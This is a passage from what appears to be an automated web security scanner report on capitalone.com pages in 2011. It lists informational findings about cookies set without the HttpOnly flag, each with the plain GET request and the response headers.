Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:11:51 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 66647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.435. http://www.capitalone.com/directbanking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:19 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D9%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:20 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 37763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.436. http://www.capitalone.com/directbanking/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directbanking/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:12:14 GMT
Server: Apache
Location: http://www.capitalone.com/directbanking/
Cache-Control: max-age=0
Expires: Wed, 02 Feb 2011 22:12:14 GMT
Content-Length: 248
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.capitalone.c
...[SNIP]...

11.437. http://www.capitalone.com/directbanking/online-banking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-banking

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /directbanking/online-banking HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:12:15 GMT
Server: Apache
Location: http://www.capitalone.com/directbanking/online-banking/
Cache-Control: max-age=0
Expires: Wed, 02 Feb 2011 22:12:15 GMT
Content-Length: 263
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.capitalone.c
...[SNIP]...

11.438. http://www.capitalone.com/directbanking/online-certificates-deposit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-certificates-deposit/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-certificates-deposit/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:13 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 31412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.439. http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-checking-accounts/interest-online-checking-account/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_03_T_SP30&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:17 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:17 GMT; path=/; domain=.capitalone.com
Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:16 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:17 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:17 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 10034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.440. http://www.capitalone.com/directbanking/online-savings-accounts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-savings-accounts/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-savings-accounts/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:12 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:12 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 32067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.441. http://www.capitalone.com/directbanking/online-savings-accounts/high-yield-money-market-account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-savings-accounts/high-yield-money-market-account/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-savings-accounts/high-yield-money-market-account/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:08 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:08 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 26985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.442. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-savings-accounts/interestplus-online-savings-account/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-savings-accounts/interestplus-online-savings-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_01_T_SP29&itc=CAPITALONE1112FYINTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:07 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE1112FYINTMKTGDF; expires=Sun, 03-Apr-2011 22:12:07 GMT; path=/; domain=.capitalone.com
Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:07 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<
...[SNIP]...

11.443. http://www.capitalone.com/directbanking/online-savings-accounts/rewards-money-market-account/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /directbanking/online-savings-accounts/rewards-money-market-account/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /directbanking/online-savings-accounts/rewards-money-market-account/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_05_T_DBREWMMA&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:13 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:13 GMT; path=/; domain=.capitalone.com
Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com
Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 31377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<
...[SNIP]...

11.444. http://www.capitalone.com/financialeducation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /financialeducation/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /financialeducation/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_06_T_FIN HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:40 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 27487

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Finan
...[SNIP]...

11.445. http://www.capitalone.com/financialeducation/creditcardact/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /financialeducation/creditcardact/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /financialeducation/creditcardact/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:39 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:39 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 24653

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi
...[SNIP]...

11.446. http://www.capitalone.com/fraud/prevention/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /fraud/prevention/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fraud/prevention/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:37 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 37509

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit
...[SNIP]...

11.447. http://www.capitalone.com/legal/privacy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /legal/privacy.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /legal/privacy.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
